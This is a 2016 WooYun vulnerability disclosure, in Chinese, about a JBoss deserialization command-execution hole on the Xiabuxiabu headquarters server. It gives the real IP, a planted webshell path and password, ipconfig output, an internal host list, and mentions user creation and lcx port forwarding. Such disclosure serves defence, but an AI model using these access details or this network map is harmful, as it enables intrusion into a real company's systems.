当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0193768

漏洞标题:呷哺呷哺总部一处命令执行漏洞/已Getshell/可探测内网大量主机

相关厂商:呷哺呷哺

漏洞作者: 路人甲

提交时间:2016-04-08 11:37

修复时间:2016-05-23 11:40

公开时间:2016-05-23 11:40

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

发现呷哺呷哺总部两处命令执行第一处刚getshell就被管理员发现给服务停止了,悲催。。。。。

详细说明:

mask 区域
*****^^一处刚刚shel*****
1.http://**.**.**/RSC/_
*****e22416813d597dbafe12.png&qu*****
**********
*****^^化命^*****
**********
*****d0b0b0d9e281924378b9.png&qu*****
**********
*****etsh*****
**********
2.http://**.**.**/RSC/qq.jsp 密码:j14n_
**********
**********
*****102584584faa7839eedb.png&qu*****
**********
*****^^*****
*****ws IP Con*****
**********
**********
**********
*****. . . . . .*****
**********
*****. . . . . . *****
**********
*****. . . . . .*****
**********
*****ed. . . . *****
**********
*****ed. . . . *****
**********
*****st. . . . . *****
**********
**********
**********
*****apter *****
**********
**********
**********
*****fic DNS Su*****
**********
*****. . . . . : BA*****
**********
*****. . . . . : 00*****
**********
*****. . . . . *****
**********
*****. . . . . . :*****
**********
*****. . . . . . :*****
**********
*****. . . . . . :*****
**********
*****. . . . . . :*****
**********
*****. . . . . . :*****
**********
*****. . . . . . :*****
**********
***** 192.168.*****
**********
*****网^*****
**********
*****gt;ne*****
***** *****
**********
*****-------------------*****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****^完^*****
**********
*****de&g*****
**********
*****^吧,道德问^*****
**********
*****d3455f2081d5397ead92.png&qu*****
**********
*****^*****
**********
*****67d52eed040797129d38.png&qu*****
**********
*****39ade3b42d861f1196af.png&qu*****
**********
*****cx转发端^*****
**********
**********
*****这^*****

漏洞证明:

之前本来发现两处的,结果第一处刚刚shell,就被发现了。
http://116.218.128.238:9000/RSC/

111.png


jboss java反序列化命令执行

111.png


直接getshell
http://116.218.128.238:9000/RSC/qq.jsp 密码:j14n

111.png


内网环境

Windows IP Configuration
Host Name . . . . . . . . . . . . : x3850
Primary Dns Suffix . . . . . . . : xiabu.net
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : xiabu.net
Ethernet adapter x3850:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : BASP Virtual Adapter
Physical Address. . . . . . . . . : 00-1A-64-DC-E4-B0
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.1.225
Subnet Mask . . . . . . . . . . . : 255.255.255.0
IP Address. . . . . . . . . . . . : 192.168.1.248
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.202
DNS Servers . . . . . . . . . . . : 192.168.1.220
192.168.1.243


大量内网主机

net view
服务器名称 注释
-------------------------------------------------------------------------------
\\360SD
\\ADRMS
\\ATTENDANCE
\\BIPC01
\\BISRV01
\\BISRV02
\\BISRV03
\\BISRV04
\\BISRV05
\\BISRV06
\\BISRV07
\\BOH-APP
\\BOHSRVUP
\\CLIENT
\\COMETDB
\\CRMDB
\\DBSRV01
\\DBTEST
\\ERP-A
\\ERP-GS
\\ERPDATABASE
\\ERPDATABASE1
\\ERPDISAPP
\\ERPENTAPP
\\ERPOVRSRV
\\ERPWEBAPP ERPWEBAPP
\\EXCAS01
\\EXCAS02
\\EXMBX01
\\EXMBX02
\\GSSERVER
\\HHT-SRV
\\HHT-TEST
\\HHTSERVER
\\HR-APP
\\HR-ATTEND
\\HR-DB02
\\IAS
\\ICBC
\\KMS
\\LYNCSTD
\\MIDSERVER
\\OA-TEST
\\OAAPP
\\OADATABASE
\\PC0176
\\PC0506
\\PC0709
\\PRINTSERVER
\\REPORT
\\SEP
\\SPDB
\\U8
\\WEBSERVER
\\WXSERVER
\\X3550
\\X3650
\\X3850
\\XB-DC01
\\XB-DC02
\\XBREPORT
\\YQZL-APP
\\YQZL-BC
\\YQZL-BCM
\\YQZL-CCB
\\YQZL-DB YQZLDB
\\YQZL-PSBC
命令成功完成。


成本 这应该是商业机密了吧,道德问题,我没看哦。。

111.png


用户

111.png


111.png


可以直接加用户 lcx转发端口 探测内网
就证明这么多吧

修复方案:

java反序列化命令执行

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评价